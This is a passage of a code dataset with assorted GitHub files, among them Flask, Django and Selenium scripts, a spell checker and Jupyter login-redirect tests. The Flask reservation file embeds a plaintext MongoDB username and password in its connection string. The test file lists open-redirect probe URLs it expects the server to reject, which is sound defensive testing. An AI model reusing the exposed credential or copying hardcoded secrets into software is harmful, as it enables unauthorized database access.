request.POST[\"origingCurrency\"]\n        originAmount = request.POST[\"receiveAmount\"]\n        givenAmount = request.POST[\"giveAmount\"]\n        rate = request.POST[\"unitRate\"]\n        givenAmountVerification = float(rate) * float(originAmount)\n        # POST values are strings, so compare numerically before trusting the submitted amount\n        if givenAmountVerification != float(givenAmount):\n            givenAmount = givenAmountVerification\n        comment = request.POST[\"commentTransfer\"]\n        transfer_by = request.user\n        transaction = Transaction(transfer_origin=origin, transfer_originAmount=originAmount,\n                                  transfer_givenAmount=givenAmount, rate=rate,\n                                  transfer_comment=comment, transfer_by = transfer_by)\n        transaction.save()\n        return redirect(dashboard)\n\n# profile\n@login_required\ndef profile(request):\n    return render(request, 'transferApp/profile.html')\n","repo_name":"jerry-maurice/CurrencyConvertion","sub_path":"transferApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"25178368515","text":"#from webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\nfrom dotenv import load_dotenv\nimport os\n\nos.system(\"clear\")\nload_dotenv()\n\nCHROMEDRIVER_PATH = os.getenv('CHROMEDRIVER_PATH')\n\nservice = Service(CHROMEDRIVER_PATH)\nbrowser = webdriver.Chrome(service=service)\nbrowser.get('https://www.python.org/')\n\n# Selenium 4 removed the find_elements_by_* helpers; use the By locator API instead\nevents_list = browser.find_elements(By.CSS_SELECTOR, 'div.medium-widget.event-widget.last ul li')\nevents = {}\n\nfor i in range(len(events_list)):\n    events[i] = {\"time\": events_list[i].text.splitlines()[0], \"name\": 
events_list[i].text.splitlines()[1]}\n\nprint(events)\n\nbrowser.quit()","repo_name":"Tiago-S-Ribeiro/Python-Pro-Bootcamp","sub_path":"100_days_of_code/Intermediate+/day_48/practice/pythonorg_test.py","file_name":"pythonorg_test.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29232228057","text":"from flask import Flask, render_template, redirect, Blueprint, url_for, request\nfrom pymongo import MongoClient, ReturnDocument\nfrom flask_cors import CORS\nimport certifi\nimport random\nimport string\n\nreservation = Blueprint('reservation', __name__)\n\nCORS(reservation)\n\nclient = MongoClient(f\"mongodb+srv://sc_delaEmi:u2JsEd0nzYssgaMd@cluster0.8qczawe.mongodb.net/test?retryWrites=true&w=majority\",tlsCAFile=certifi.where()) \ndb=client['test']\nreservations=db.reservations\n\n#Reference to the spaces collection in the database\n#lay as of layout\nlay = db.spaces\n\n\n#Redirect to the specific restaurant in html\n@reservation.route('/respageBurritos', methods=['POST'])\ndef respageBurritos():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n print(name)\n return render_template(\"./reservation.html\", restaurant=\"Burrito\", hour=hour, location=location, name=name, tab=tab)\n\n@reservation.route('/respageBurger', methods=['POST'])\ndef respageBurger():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n return render_template(\"./reservation.html\", restaurant=\"Burger\", hour=hour, location=location, name=name, tab=tab)\n\n@reservation.route('/respageMenudo', methods=['POST'])\ndef respageMenudo():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n return render_template(\"./reservation.html\", restaurant=\"Menudo\", hour=hour, location=location, name=name, tab=tab)\n\n@reservation.route('/respagePizza', methods=['POST'])\ndef respagePizza():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n print(name)\n return render_template(\"./reservation.html\", restaurant=\"Pizza\", hour=hour, location=location, name=name, tab=tab)\n\n@reservation.route('/respageChinese', methods=['POST'])\ndef respageChinese():\n hour = request.form.get('restaurantHour')\n location = request.form.get('restaurantType')\n name = request.form.get('restaurantId')\n tab = request.form.get('tabId')\n return render_template(\"./reservation.html\", restaurant=\"Chinese\", hour=hour, location=location, name=name, tab=tab)\n#-------------------------------------------------------------------------\n\n@reservation.route('/confirmationPage', methods=['POST'])\ndef confirmationPage():\n #Generates random key\n letters=string.ascii_lowercase\n result=''.join(random.choice(letters) for i in range(5))\n print(result)\n #---------------------------------\n\n arr = list(lay.find({'restaurantName': request.form.get('restaurantName'), 'hour': request.form.get('seletedHour'),\"tab_id\": request.form.get('tabId')}, {\"_id\":0, \"restaurantName\":1, \"hour\":1, \"tab_id\":1, \"avalible\":1}))\n print(arr[0][\"avalible\"])\n if arr[0][\"avalible\"]:\n 
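# note: the availability check above and the update below run as separate queries, so two\n        # concurrent requests could both claim this slot; an atomic find_one_and_update would\n        # avoid that race\n        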
db.reservations.insert_one({\n 'restaurantName': request.form.get('restaurantName'),\n 'reservationName': request.form.get('nameInput'),\n 'guests': request.form.get('inputGuess'),\n 'times': request.form.get('seletedHour'),\n 'adaneeded': request.form.get('ada'),\n 'coments': request.form.get('comments'),\n 'key': result,\n 'tab_id':request.form.get('tabId')})\n \n\n lay.update_one(\n { 'tab_id':request.form.get('tabId'), 'restaurantName': request.form.get('restaurantName'), 'hour': request.form.get('seletedHour')},\n {\"$set\": { \"avalible\": False }}\n )\n\n return render_template(\"./confirmationPage.html\", result=result)\n else:\n return \"Invalid\"\n \n#---------------------------------------------------------------------\n\n\n@reservation.route('/deleteReservation')\ndef deleteReservationForm():\n return render_template(\"./deleteReservation.html\")\n\n@reservation.route('/deleteReservationQuery', methods=['POST'])\ndef deleteReservation():\n name = request.form.get('userName')\n keyRes = request.form.get('keyRes')\n\n reservationList = list(reservations.find({\"reservationName\": name, \"key\": keyRes}, {\"_id\":0, \"tab_id\":1, \"restaurantName\":1, \"times\":1}))\n\n if len(reservationList) < 1:\n alertMsg = \"Invalid reservation\"\n return render_template(\"./deleteReservation.html\", alertMsg=alertMsg)\n\n reservation = reservations.find_one({\"reservationName\": name, \"key\": keyRes})\n\n if reservation:\n reservations.delete_one({\"reservationName\": name, \"key\": keyRes})\n\n lay.update_one(\n { 'tab_id':reservationList[0]['tab_id'], 'restaurantName':reservationList[0]['restaurantName'], 'hour':reservationList[0]['times']},\n {\"$set\": { \"avalible\": True }}\n )\n return render_template(\"./conPage.html\", output=\"Query has been deleted\")\n else:\n alertMsg = \"Reservation does not exist\"\n return render_template(\"./deleteReservation.html\", alertMsg=alertMsg)\n#---------------------------------------------------------------------\n\n@reservation.route('/editReservation')\ndef editReservationForm():\n return render_template(\"./editReservationQuery.html\")\n\n@reservation.route('/editReservationFinder', methods=['POST'])\ndef editReservationFinder():\n name=request.form.get('userName')\n keyRes=request.form.get('keyRes')\n\n reservation = reservations.find_one({\"reservationName\": name, \"key\": keyRes})\n if reservation:\n query = {\n \"reservationName\": reservation[\"reservationName\"],\n \"guests\": reservation[\"guests\"],\n \"adaneeded\": reservation[\"adaneeded\"],\n \"coments\": reservation[\"coments\"],\n \"restaurantName\": reservation[\"restaurantName\"],\n \"times\": reservation[\"times\"],\n \"key\": reservation[\"key\"]\n }\n return render_template(\"./editReservation.html\", query=query)\n else:\n alertMsg = \"Reservation does not exist\"\n return render_template(\"./editReservationQuery.html\", alertMsg=alertMsg)\n \n\n@reservation.route('/editReservationQuery', methods=['POST'])\ndef editReservationQuery():\n name=request.form.get('userName')\n guestNo=request.form.get('guests')\n keyRes=request.form.get('keyRes')\n comments=request.form.get('coments')\n print(name)\n\n print(reservations.update_one(\n { \"reservationName\":name, \"key\":keyRes},\n { \"$set\": { \"guests\": guestNo,\n \"coments\": comments } }\n ))\n \n return render_template(\"./conPage.html\", output=\"Query has been 
updated\")\n","repo_name":"Emiliano-DLC/ResRev","sub_path":"reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74976093538","text":"import sqlite3\nimport re\nimport xml.etree.ElementTree as ET\nimport string\nimport numpy as np\nfrom nltk.tokenize import word_tokenize\nfrom collections import Counter\n\n# Method to parse a TMX file and dump its contents into a database\ndef tmx_to_sql(db_path, tmx_path):\n # Opening and connecting to database\n conn = sqlite3.connect(db_path)\n cur = conn.cursor()\n \n # Creating table if not exists\n cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS \"translations\" (\n \"source_text\" TEXT,\n \"target_text\" TEXT,\n \"source_lang\" TEXT,\n \"target_lang\" TEXT\n );\"\"\")\n \n # Running some replacements in TMX file\n try:\n with open(tmx_path, 'rt', encoding=\"utf-8-sig\") as f:\n content = f.read()\n print('Reading', tmx_path)\n content = content.replace(\"xml:lang\", \"lang\") # modifying lang attribute so the parser captures it\n content = re.sub(']*?>', '', content) # removing bpt tags from TMX/XLIFF\n content = re.sub(']*?>', '', content) # removing ept tags from TMX/XLIFF\n with open(tmx_path, 'wt', encoding=\"utf-8-sig\") as f:\n f.write(content)\n except: # trying reading with UTF-16 encoding and writing as UTF-8 BOM so the ET parser recognizes as XML\n try:\n with open(tmx_path, 'rt', encoding='utf16') as f:\n content = f.read()\n print('Reading', tmx_path)\n content = content.replace(\"xml:lang\", \"lang\") # modifying lang attribute so the parser captures it\n content = re.sub(']*?>', '', content) # removing bpt tags from TMX/XLIFF\n content = re.sub(']*?>', '', content) # removing ept tags from TMX/XLIFF\n content = content.replace(\"UTF-16LE\", \"utf-8\") # avoiding encoding issue when parsing TMX\n with open(tmx_path, 'wt', encoding=\"utf-8-sig\") as f:\n f.write(content)\n except: # showing file with error\n print('Error reading file', tmx_path)\n \n # Parsing TMX file\n doc = ET.parse(tmx_path)\n root = doc.getroot()\n tu_list = root.findall(\"./body/tu\")\n \n # Looping through every translation unit\n for tu in tu_list:\n # Getting the translation unit pairs\n tuv = tu.findall(\"tuv\")\n\n for i in range(1, len(tuv)):\n # Retrieving specific values for our database\n source_text = tuv[0].find(\"seg\").text\n target_text = tuv[i].find(\"seg\").text\n source_lang = tuv[0].get(\"lang\").lower()\n target_lang = tuv[i].get(\"lang\").lower()\n \n # Inserting entries into our database\n cur.execute(\"INSERT INTO translations VALUES (?, ?, ?, ?)\", (source_text, target_text, source_lang, target_lang))\n \n # Committing the changes into the database\n conn.commit()\n \n # Closing database connection\n cur.close()\n conn.close()\n\n\n# Method to clean or pre-process the sentence before its use\ndef process_sentence(sentence):\n '''\n Input:\n sentence: a string containing the retrieved sentence\n Output:\n sentence_clean: a list of words containing the processed sentence\n '''\n # Removing punctuation from the sentence\n sentence = sentence.translate(str.maketrans('', '', string.punctuation))\n sentence = re.sub('[0-9]', '', sentence) # removing numbers\n \n # Tokenizing sentence\n sentence_tokens = word_tokenize(sentence)\n \n sentence_clean = []\n for word in sentence_tokens:\n sentence_clean.append(word.lower()) # lowering word\n \n return sentence_clean\n\n\n# Method to build the frequency 
dictionary\ndef build_freqs(words_all):\n '''\n Input:\n words_all: a list of words representing the corpus. \n Output:\n freqs: The wordcount dictionary where key is the word and value is its frequency.\n '''\n \n freqs = {}\n for word in words_all:\n if word in freqs.keys(): # incrementing the count if the word already exists in the dictionary\n freqs[word] += 1\n else: # setting to 1 since the word doesn't exist yet in the dictionary\n freqs[word] = 1\n \n return freqs\n\n\n# Method to build the probabilities dictionary\ndef get_probs(freqs, num_words):\n '''\n Input:\n freqs: The wordcount dictionary where key is the word and value is its frequency\n num_words: The number of total words from the words_all list (no duplicates)\n Output:\n probs: A dictionary where keys are the words and the values are the probability that a word will occur\n '''\n probs = {}\n \n for word, freq in freqs.items():\n probs[word] = freq / num_words # getting the probability of a word appearing in the whole corpus (frequency of a word divided by total number of words)\n \n return probs\n\n\n# Method to find every single occurrence of output words when a character is deleted\ndef delete_letter(word):\n '''\n Input:\n word: input word\n Output:\n delete_l: a list of all possible words obtained by deleting 1 character from word\n '''\n\n # Using list comprehensions\n split_l = [(word[:i], word[i:]) for i in range(len(word) + 1)] # splitting a word into all possible tuples with two elements (left and right)\n delete_l = [L + R[1:] for L, R in split_l if len(R) > 0] # building word by removing the first character in the right part of every tuple\n\n return delete_l\n\n\ndef switch_letter(word):\n '''\n Input:\n word: input string\n Output:\n switches: a list of all possible strings with one adjacent charater switched\n ''' \n\n # Using list comprehensions\n split_l = [(word[:i], word[i:]) for i in range(len(word) + 1)] # splitting a word into all possible tuples with two elements (left and right)\n switch_l = [L + R[1] + R[0] + R[2:] for L, R in split_l if len(R) > 1] # building word by switching first and second characters from the right part of every tuple\n\n return switch_l\n\n\ndef replace_letter(word):\n '''\n Input:\n word: input word \n Output:\n replaces: a list of all possible strings where we replaced one letter from the original word\n ''' \n \n letters = 'abcdefghijklmnopqrstuvwxyz'\n replace_l = []\n \n split_l = [(word[:i], word[i:]) for i in range(len(word) + 1)] # splitting a word into all possible tuples with two elements (left and right)\n for L, R in split_l:\n if len(R) > 0:\n for letter in letters:\n replace_l.append(L+R[0].replace(R[0], letter) + R[1:]) # building word by replacing the first character from the right part of the tuple with any letter\n replace_set = set(replace_l)\n replace_set.discard(word)\n replace_l = list(replace_set)\n \n return replace_l\n\n\ndef insert_letter(word):\n '''\n Input:\n word: input word\n Output:\n inserts: a set of all possible strings with one new letter inserted at every position\n ''' \n letters = 'abcdefghijklmnopqrstuvwxyz'\n insert_l = []\n \n split_l = [(word[:i], word[i:]) for i in range(len(word) + 1)] # splitting a word into all possible tuples with two elements (left and right)\n for L, R in split_l:\n for letter in letters:\n insert_l.append(L + letter + R[0:]) # building word by inserting a letter before the first character from the right part of the tuple\n \n return insert_l\n\ndef edit_one_letter(word):\n \"\"\"\n Input:\n word: the 
input word for which we will generate all possible words that are one edit away\n    Output:\n        edit_one_set: a set of words with one possible edit\n    \"\"\"\n    \n    edit_one_list = list()\n\n    # Appending every possible word that can be formed by deleting, switching, replacing or inserting a letter from the word\n    edit_one_list += delete_letter(word)\n    edit_one_list += switch_letter(word)\n    edit_one_list += replace_letter(word)\n    edit_one_list += insert_letter(word)\n    \n    edit_one_set = set(edit_one_list)\n\n    return edit_one_set\n\n\ndef edit_two_letters(word):\n    '''\n    Input:\n        word: the input word for which we will generate all possible words that are two edits away\n    Output:\n        edit_two_set: a set of words with all possible two edits\n    '''\n    \n    edit_one_list = list()\n    edit_two_list = list()\n\n    # Appending every possible word that can be formed by deleting, switching, replacing or inserting a letter from the word\n    edit_one_list += delete_letter(word)\n    edit_one_list += switch_letter(word)\n    edit_one_list += replace_letter(word)\n    edit_one_list += insert_letter(word)\n\n    # Doing the same as above (being two edit distance now) from every possible word formed previously\n    for edit_one_word in edit_one_list:\n        edit_two_list += delete_letter(edit_one_word)\n        edit_two_list += switch_letter(edit_one_word)\n        edit_two_list += replace_letter(edit_one_word)\n        edit_two_list += insert_letter(edit_one_word)\n    \n    edit_two_set = set(edit_two_list)\n    \n    return edit_two_set\n\n\ndef get_corrections(word, probs, vocab, n):\n    '''\n    Input: \n        word: a user entered word to check for suggestions\n        probs: a dictionary that maps each word to its probability in the corpus\n        vocab: a list containing all the vocabulary\n        n: number of possible word corrections you want returned in the dictionary\n    Output: \n        n_best: a list of tuples with the most probable n corrected words and their probabilities\n    '''\n    \n    suggestions = [] # list where all the possible suggestions will be appended\n    suggestions_dict = {} # dictionary where only the suggested words appearing in the vocabulary will be added, along with its probability in the corpus\n    n_best = [] # list of tuples where the specific number of final suggestions (n) will be returned\n\n    # Getting suggestions at one edit distance\n    suggestions = list(edit_one_letter(word))\n\n    # Looping through every suggestion in the vocabulary and building the suggestions dictionary with their probabilities\n    for suggestion in suggestions:\n        if suggestion in vocab:\n            prob = probs[suggestion]\n            suggestions_dict[suggestion] = prob\n\n    # If we don't get any suggestions at one edit distance, we'll look for suggestions at two edit distance\n    if len(suggestions_dict) == 0:\n        further_suggestions = list(edit_two_letters(word))\n        for further_suggestion in further_suggestions:\n            if further_suggestion in vocab:\n                prob = probs[further_suggestion]\n                # store the two-edit candidate under its own key\n                suggestions_dict[further_suggestion] = prob\n\n    # Sorting the dictionary with the helper function Counter to get the most common words\n    c = Counter(suggestions_dict)\n    n_best = c.most_common(n) # list of tuples (word, probability) sorted by most common\n    \n    return n_best\n","repo_name":"CarlosNLP/language-model","sub_path":"spell-checker/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"73676267617","text":"import time\nimport os\nimport pdf_to_image as pf\nimport tesseractIO as Tessa\nimport pdf_to_tiff as red\nimport gc\nfrom bridge 
import bridger\n\nstart_time = time.time()\npdf_loc = os.path.abspath('./1. Pdf_input/')\nimg_out = os.path.abspath('./2. Images_to_parse/')\ntxt_out = os.path.abspath('./3. Output_txt/')\nbridge_path = os.path.abspath('./4. Bridge/')\n\n\ndef i_parse_pdf(pdfname, out_name):\n pf.pdftopil(pdfname, img_out, out_name, 'png')\n\n\ndef i_deliver_txt(in_fold, out_fold):\n in_fold = '\"' + in_fold + '\"'\n out_fold = '\"' + out_fold + '\"'\n lang = 'eng'\n Tessa.write_command(in_parse=in_fold, outcome=out_fold + '-' + lang, lang=lang)\n gc.collect()\n\n\ndef i_see_dead_people(in_fold, out_fold):\n in_fold = '\"' + in_fold + '\"'\n out_fold = '\"' + out_fold + '\"'\n # ell0: big, ell1: fast,\n # ell: best, ell3: last\n # eng\n red.write_command(in_parse=in_fold, outcome=out_fold)\n gc.collect()\n\n\ndef deliverance(path, out_path, func_to_call):\n for i in os.listdir(path):\n gc.collect()\n final = str(path + '\\\\' + i)\n final_out = str(out_path + '\\\\' + str(i).split('.')[0])\n func_to_call(final, final_out)\n\n\nif __name__ == '__main__':\n s = input('choose what to parse:')\n\n if s == 'pdf':\n deliverance(pdf_loc, img_out, i_parse_pdf)\n elif s == 'txt':\n deliverance(img_out, txt_out, i_deliver_txt)\n elif s == 'side':\n deliverance(pdf_loc, img_out, i_see_dead_people)\n elif s == 'bridge':\n deliverance(txt_out, bridge_path, bridger)\n print(\"Time taken : \" + str(time.time() - start_time))\n","repo_name":"humble-goat/invoice-to-txt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18431617173","text":"\"\"\"Tests for login redirects\"\"\"\n\nfrom functools import partial\nfrom urllib.parse import urlencode\n\nimport pytest\nfrom tornado.httpclient import HTTPClientError\nfrom tornado.httputil import url_concat, parse_cookie\n\nfrom jupyter_server.utils import url_path_join\n\n\n# override default config to ensure a non-empty base url is used\n@pytest.fixture\ndef jp_base_url():\n return \"/a%40b/\"\n\n\n@pytest.fixture\ndef jp_server_config(jp_base_url):\n return {\n \"ServerApp\": {\n \"base_url\": jp_base_url,\n },\n }\n\n\nasync def _login(jp_serverapp, http_server_client, jp_base_url, next):\n # first: request login page with no creds\n login_url = url_path_join(jp_base_url, \"login\")\n first = await http_server_client.fetch(login_url)\n cookie_header = first.headers[\"Set-Cookie\"]\n cookies = parse_cookie(cookie_header)\n\n # second, submit login form with credentials\n try:\n resp = await http_server_client.fetch(\n url_concat(login_url, {\"next\": next}),\n method=\"POST\",\n body=urlencode(\n {\n \"password\": jp_serverapp.token,\n \"_xsrf\": cookies.get(\"_xsrf\", \"\"),\n }\n ),\n headers={\"Cookie\": cookie_header},\n follow_redirects=False,\n )\n except HTTPClientError as e:\n if e.code != 302:\n raise\n return e.response.headers[\"Location\"]\n else:\n assert resp.code == 302, \"Should have returned a redirect!\"\n\n\n@pytest.fixture\ndef login(jp_serverapp, http_server_client, jp_base_url):\n \"\"\"Fixture to return a function to login to a Jupyter server\n\n by submitting the login page form\n \"\"\"\n yield partial(_login, jp_serverapp, http_server_client, jp_base_url)\n\n\n@pytest.mark.parametrize(\n \"bad_next\",\n (\n r\"\\\\tree\",\n \"//some-host\",\n \"//host{base_url}tree\",\n \"https://google.com\",\n \"/absolute/not/base_url\",\n ),\n)\nasync def test_next_bad(login, jp_base_url, bad_next):\n bad_next = 
bad_next.format(base_url=jp_base_url)\n    url = await login(bad_next)\n    assert url == jp_base_url\n\n\n@pytest.mark.parametrize(\n    \"next_path\",\n    (\n        \"tree/\",\n        \"//{base_url}tree\",\n        \"notebooks/notebook.ipynb\",\n        \"tree//something\",\n    ),\n)\nasync def test_next_ok(login, jp_base_url, next_path):\n    next_path = next_path.format(base_url=jp_base_url)\n    expected = jp_base_url + next_path\n    actual = await login(next=expected)\n    assert actual == expected\n","repo_name":"xinyangwy/doubanFlask","sub_path":"venv/Lib/site-packages/jupyter_server/tests/auth/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"34"} {"seq_id":"22130038862","text":"import glob\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef mean(tl):\r\n    return sum(tl) / len(tl)\r\n\r\ndef median(tl):\r\n    n = len(tl)\r\n    tl.sort()\r\n\r\n    if n % 2 == 0:\r\n        m1 = tl[n//2]\r\n        m2 = tl[n//2 - 1]\r\n        return (m1 + m2)/2\r\n    else:\r\n        return tl[n//2]\r\n\r\nif __name__ == \"__main__\":\r\n    # Job completion times mean and median\r\n    with open('master.log', 'r') as file:\r\n        tct = [] #task completion time\r\n        while True:\r\n            #extract times of each job stored in a separate line\r\n            line = file.readline()\r\n            if not line:\r\n                break\r\n            tct.append(float(line.split(':')[-1]))\r\n\r\n        print('mean(jobs) = ', str(mean(tct)))\r\n        print('median(jobs) = ', str(median(tct)))\r\n\r\n    # Task completion times mean and median\r\n    files = glob.glob('worker*.log')\r\n    tct = []\r\n    num_tasks = []\r\n    etimes = [] #execution times\r\n    tasks = []\r\n    s = 1\r\n    for f in files:\r\n        c, t = 0, 0\r\n        with open(f, 'r') as file:\r\n            while True:\r\n                #extract times of each job stored in a separate line\r\n                line = file.readline()\r\n                if not line:\r\n                    break\r\n                tt = float(line.split(':')[-1])\r\n                c = c + 1\r\n                t = t + tt\r\n                tct.append(tt)\r\n        num_tasks.append(c)\r\n        etimes.append(t)\r\n        tasks.append('W' + str(s) + '(' + str(c) + ')')\r\n        s = s + 1\r\n\r\n\r\n    print('mean(tasks) = ', str(mean(tct)))\r\n    print('median(tasks) = ', str(median(tct)))\r\n\r\n    # creating the bar plot\r\n    fig = plt.figure()\r\n    plt.bar(tasks, etimes, color ='maroon', width = 0.4)\r\n    plt.ylabel(\"Time\")\r\n    plt.xlabel(\"No. of tasks scheduled\")\r\n    plt.title(\"Number of tasks scheduled on each machine against time\")\r\n    plt.show()\r\n","repo_name":"rajanyav/big_data","sub_path":"big data project/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"27734140203","text":"from dessia_common.core import DessiaObject\nimport dessia_common.checks as checks\n\n\nclass Battery(DessiaObject):\n    \"\"\" Mock a battery. 
\"\"\"\n\n def __init__(self, capacity: float, number_cells: int, name: str = ''):\n\n DessiaObject.__init__(self, name=name)\n self.capacity = capacity\n self.number_cells = number_cells\n\n def check_list(self, level='info'):\n check_list = DessiaObject.check_list(self, level=level, check_platform=False)\n\n check_list += checks.is_float(self.capacity, level=level)\n check_list += checks.is_int(self.number_cells, level=level)\n check_list += checks.is_str(self.name, level=level)\n\n return check_list\n\n\nBATTERY = Battery(3., 2, 'Good name')\nCHECK_LIST = BATTERY.check_list()\nprint(CHECK_LIST)\nCHECK_LIST.raise_if_above_level('error')\n\nBATTERY = Battery(None, 22.2, 1)\nINVALID_CHECK_LIST = BATTERY.check_list()\nprint(INVALID_CHECK_LIST)\n\nraised = False\ntry:\n INVALID_CHECK_LIST.raise_if_above_level('error')\nexcept:\n raised = True\n\nassert raised\n\n\nclass ElectricChar2(DessiaObject):\n \"\"\" Mock a system using a battery. \"\"\"\n\n def __init__(self, battery: Battery, brand: str, model: str, price: int, autonomy: int, name: str = ''):\n\n DessiaObject.__init__(self, name=name)\n self.battery = battery\n self.brand = brand\n self.model = model\n self.price = price\n self.autonomy = autonomy\n","repo_name":"Dessia-tech/dessia_common","sub_path":"tests/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8593587729","text":"from django.urls import path, include\n\nfrom . import views\n\nurlpatterns = [\n path('login/', views.login_view, name='login'),\n path('logout/', views.logout_view, name='logout'),\n path('callback/', views.get_access_token, name='get_access_token'),\n path('settings/', views.settings, name='settings'),\n path('delete-account/', views.delete_account, name='delete_account'),\n]\n","repo_name":"maxamuss/Warwick-CATulator","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"14429722959","text":"SETTING_FILENAME = 'filename'\nSETTING_RECENT_FILES = 'recentFiles'\nSETTING_WIN_SIZE = 'window/size'\nSETTING_WIN_POSE = 'window/position'\nSETTING_WIN_GEOMETRY = 'window/geometry'\nSETTING_LINE_COLOR = 'line/color'\nSETTING_FILL_COLOR = 'fill/color'\nSETTING_ADVANCE_MODE = 'advanced'\nSETTING_WIN_STATE = 'window/state'\nSETTING_SAVE_DIR = 'savedir'\nSETTING_PAINT_LABEL = 'paintlabel'\nSETTING_LAST_OPEN_DIR = 'lastOpenDir'\nSETTING_PREPROCESSING_PATH = 'preProcessing'\nSETTING_CSVDATABASE = 'csvDB'\nSETTING_AUTO_SAVE = 'autosave'\nSETTING_RECOMMENDER = 'recommend'\nSETTING_SINGLE_CLASS = 'singleclass'\nFORMAT_PASCALVOC='PascalVOC'\nFORMAT_YOLO='YOLO'\nFORMAT_CREATEML='CreateML'\nFORMAT_CSV = 'CSV'\nFORMAT_ONECSV = 'ONECSV'\nSETTING_DRAW_SQUARE = 'draw/square'\nSETTING_LABEL_FILE_FORMAT= 'labelFileFormat'\nDEFAULT_ENCODING = 'utf-8'\nBUTTON_CSS = \"background-image : url(xxxxx.jpg);margin: 1px; padding: 10px;\\\n background-color: \\\n rgba(255,255,0,255); \\\n color: rgba(0,0,0,255); \\\n border-style: solid; \\\n border-radius: 4px; border-width: 3px; \\\n border-color: rgba(0,0,0,255);\"\nSETTING_PREPATH = 'prepath'","repo_name":"mrelmi/LabelFace","sub_path":"libs/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23180787917","text":"from pprint 
import pprint\n\n\ndef unfair_districts(number, data):\n    height, width = len(data), len(data[1])\n    valid = {(x, y) for y in range(width) for x in range(height)}\n    out = [['']*width for _ in range(height)]\n    stack = [((0, 0), [((0,0),)])]\n    while stack:\n        (x, y), area = stack.pop()\n\n        last_group = area.pop()\n        # sum the people in last_group; if it is more than needed, restart the loop (this element is already removed from the stack)\n        # if it is exactly what is needed, put last_group back into area: -- area, last_group = area+[last_group], ()\n        neighbors = {(x+1, y), (x-1, y), (x, y+1), (x, y-1)} & valid\n        for i in (neighbors - set(sum(area, ())+last_group)): # loop over the current cell's neighbors, except those already in area\n            stack += [(i, area+[last_group+(i,)])] # push the current neighbor onto the stack, putting the current cell into the last group, or\n            # create a new group with the current cell as its first. New stack entries end with the current neighbor; the leading coordinate always equals the cell at the end\n            if len(last_group) in [1, 2]:# skip this when the new cell at the end is alone; in that case last_group is empty\n                stack += [(last_group[-1], area+[last_group+(i,)])] # add an entry that starts with the previous cell and ends with the new one\n                # if the last cell that closed the previous sequence has other neighbors => there will be more entries with the new cell\n            #\n\nif __name__ == '__main__':\n    pprint(unfair_districts(5, [[[2, 1], [1, 1], [1, 2]],\n                                [[2, 1], [1, 1], [0, 2]]]))\n#\n# pprint(unfair_districts(9, [[[0, 3], [3, 3], [1, 1], [3, 3]],\n#                             [[1, 2], [1, 0], [1, 1], [1, 1]],\n#                             [[0, 3], [2, 1], [2, 2], [1, 0]]]))\n\n# pprint(unfair_districts(9, [\n#     [[0, 3], [3, 3], [1, 1]],\n#     [[1, 2], [1, 0], [1, 1]],\n#     [[0, 3], [2, 1], [2, 2]]]))\n# from itertools import chain\n# from collections import defaultdict\n#\n# def checker(solution, amount_of_people, grid, win_flg=True):\n#\n#     w, h = len(grid[0]), len(grid)\n#     size = w * h\n#     cell_dic = {}\n#\n#     # make cell_dic\n#     def adj_cells(cell):\n#         result = []\n#         if cell % w != 1 and cell - 1 > 0:\n#             result.append(cell - 1)\n#         if cell % w and cell + 1 <= size:\n#             result.append(cell + 1)\n#         if (cell - 1) // w:\n#             result.append(cell - w)\n#         if (cell - 1) // w < h - 1:\n#             result.append(cell + w)\n#         return set(result)\n#\n#     for i, v in enumerate(chain(*grid)):\n#         cell_dic[i + 1] = {'vote': v, 'adj': adj_cells(i + 1)}\n#\n#     answer = solution(amount_of_people, grid)\n#\n#     if answer == [] and not win_flg:\n#         return True\n#\n#     if not isinstance(answer, list):\n#         print('wrong data type :', answer)\n#         return False\n#     else:\n#         if len(answer) != h:\n#             print('wrong data length', answer)\n#             return False\n#         for an in answer:\n#             if len(an) != w:\n#                 print('wrong data length', an)\n#                 return False\n#\n#     ds_dic = defaultdict(list)\n#     for i, r in enumerate(''.join(answer), start=1):\n#         ds_dic[r].append(i)\n#\n#     # answer check\n#     def district_check(d):\n#         all_cells = set(d[1:])\n#         next_cells = cell_dic[d[0]]['adj'] & set(d)\n#         for _ in range(len(d)):\n#             all_cells -= next_cells\n#             next_cells = 